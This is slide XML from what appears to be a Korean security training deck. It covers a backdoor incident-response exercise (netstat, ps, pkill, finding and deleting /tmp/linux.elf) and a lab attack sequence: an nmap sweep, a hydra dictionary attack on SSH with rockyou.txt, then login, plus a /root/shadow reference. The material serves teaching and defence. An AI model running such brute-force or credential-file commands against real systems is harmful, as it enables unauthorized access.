          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="-1" t="75071" r="111"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314441" y="1090633"/>
            <a:ext cx="4947920" cy="735477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34395978-B9BB-4247-AB05-15CF4EFB3C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="66256"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291835" y="2324100"/>
            <a:ext cx="4959223" cy="995637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7051361A-A816-4D54-9650-AAEAA2A01279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="3596640"/>
            <a:ext cx="5616792" cy="289235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 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># aehcek</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/root/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE63070-84AD-4DF5-8C2B-A77D3520EC6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A2BFCBC-D873-4CF2-B71E-37DB2EBF208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0E0C087-F915-4BB4-BEC5-23B4FAB544A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23CA0F-9700-4100-84B1-7B2B9E8647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691960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72AF5CF2-5352-4A46-B0EB-8A66B562E7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시스템에 해커가 침입하여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내부에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심어 놨다는 정보가 입수되었다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외부 공격자 서버와 접속 중인 것으로 보이는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찾아 삭제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열린 포트 목록 확인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: netstat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tnap</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확인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ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> -ef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중지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pkill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2C72BED5-71CD-4D9B-90ED-1967D0EE91BE}"/>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771BDEB3-AF50-47EA-BD0D-EFBAD1A250F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86B8AF3E-54E3-484F-B88B-76A5A200174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5EB805CD-A0E2-4B2D-8722-1E14160DB68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9436987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netstat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>| more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 열린 포트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패킷 캡처 및 분석</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사용자 서버와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.1.169 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 간에 많은 통신이 수행되고 있음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>와 통신하는 포트 및 프로세스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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 189">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{728B4C54-43A6-446E-9DF2-58C0AE154DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="477520" y="879686"/>
            <a:ext cx="4877816" cy="2735199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 191">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B247FD-E1F6-4EF3-9F6D-FC3F3EC6D8CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="6493" r="2233"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="4282440"/>
            <a:ext cx="4877816" cy="609684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 193">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3EBBEC8-DFA0-4959-BBFF-C5F1A8B5872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="61214" r="350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491072" y="5158135"/>
            <a:ext cx="4989196" cy="1064852"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9969BFB-5647-4C23-96C6-0F1477534FF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="37140" r="480"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="486293"/>
            <a:ext cx="4982591" cy="1747985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B282583C-EB70-428E-A36A-5E719528FD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="36093"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340729" y="2995262"/>
            <a:ext cx="4877816" cy="1747985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0A445C-03BC-4C6F-9C9B-0EB26966B6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2078761004"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6340729" y="4803146"/>
          <a:ext cx="4932807" cy="1467993"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="299628295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22453205"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="99415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찾는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>find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명령도 활용 가능</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find / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>-name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>linux</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.elf</a:t>
                      </a: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91311"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80897" name="_x1658364984">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1621EE3-D92B-43A5-A1BC-CB3D95DE5E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2352" y="5648745"/>
            <a:ext cx="3733800" cy="47942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AB88123D-B7BC-438E-8414-0486723573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AD1A3903-D332-424C-978F-BE1E5D97FD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C382FE5-43E0-45C4-A508-B6BD6ADE31E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9" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC19145-4568-4C52-BC8C-97F5B497EBD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650507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err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로세스 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –ef | grep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해당 프로세스 강제 종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 의심 프로그램 파일 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># rm /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 199">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBC3C99-54C1-4543-AEE4-CC09504CFFD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="864446"/>
            <a:ext cx="5019040" cy="542544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 201">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B1EF64E-0818-4E2B-B2FB-91D8CF887FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="2324" r="-82" b="82276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="1988820"/>
            <a:ext cx="3096260" cy="179535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 203">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69C25BA-3706-4FD8-8E42-8515EC5CD85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="561340" y="2838026"/>
            <a:ext cx="5019040" cy="434086"/>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B7C851B8-522B-416D-AB73-C1FA38C7270C}"/>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351ACD0D-22AC-459D-AC25-74602AE05A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2689406-141B-46FB-832E-C29CA47A576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08FF523B-5DD7-4041-B815-DE1221EABF3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E9587C41-E371-443D-9F1E-E8A25BC3202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455626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Hydra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test01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계정을 대상으로 사전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CB406BD3-10D5-4A58-835B-B5C243F7E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90558-D247-4439-A0AA-ADB9053034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9C71B8-34E7-4D91-BDDD-0E3ECEB0A0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CCB8595-4394-494E-9381-AF2CC6F7C2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3646248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서버가 위치한 네트워크 주소 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ifconfig</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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 네트워크 스캔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 10.10.1.0/24</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6688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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 사전 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># hydra –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l test01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>wordlists/rockyou.txt ssh://10.10.1.14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획득한 계정 정보로 로그인 시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>test01@10.10.1.14</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종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 205">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{641E41BC-2181-4A24-9860-CB1DE03DC223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515620" y="1077806"/>
            <a:ext cx="4963668" cy="2660523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 207">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CD3FC64-78B4-4FEF-ADFF-317B4E741FC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515620" y="4247726"/>
            <a:ext cx="4963668" cy="1936242"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 209">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55E0EAF3-BD00-4E24-917C-541DE2C73735}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
